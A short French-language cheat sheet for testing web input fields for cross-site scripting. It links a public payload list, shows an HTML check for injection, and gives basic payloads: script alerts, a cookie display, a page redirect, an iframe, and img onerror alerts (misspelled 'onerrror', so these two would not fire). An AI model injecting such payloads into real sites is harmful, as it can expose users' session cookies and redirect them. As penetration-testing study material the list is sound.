Plein de payloads : https://github.com/payloadbox/xss-payload-list

Vérifier la possibilité d’une injection XSS

<u>Test</u>

Si on visualise Test, souligné. Alors la saisie utilisateur est interprétée comme du code, il est probable que le champ de saisie soit vulnérable aux XSS.

Afficher une pop-up

<script>alert('XSS')</script>

Visualiser les cookies

<script>alert(document.cookie)</script>

Rediriger l’utilisateur

<script>window.location="<https://www.google.fr>"</script>

Créer une iframe (peu utile car souvent bloquer par le navigateur)

<iframe src="<http://127.0.0.1/>"></iframe>

Autres payloads basiques

<img src=1 onerrror=alert('xss')>

<img src=1 onerrror=prompt('xss')>